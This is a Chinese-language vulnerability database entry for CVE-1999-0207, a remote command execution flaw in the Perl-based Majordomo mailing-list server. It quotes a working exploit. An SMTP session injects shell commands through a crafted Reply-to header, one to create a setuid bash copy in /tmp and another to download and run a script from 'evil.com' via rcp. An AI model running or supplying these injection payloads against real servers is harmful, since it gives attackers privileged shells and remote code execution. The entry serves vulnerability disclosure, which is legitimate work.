Majordomo邮件列表管理软件远程执行任意命令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105240 漏洞类型 未知
发布时间 1994-06-06 更新时间 2005-10-12
CVE编号 CVE-1999-0207 CNNVD-ID CNNVD-199406-003
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20597
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199406-003
|漏洞详情
Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2310/info

Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. 

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:great_circle_associates:majordomo:1.90*cpe:/a:great_circle_associates:majordomo:1.91*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207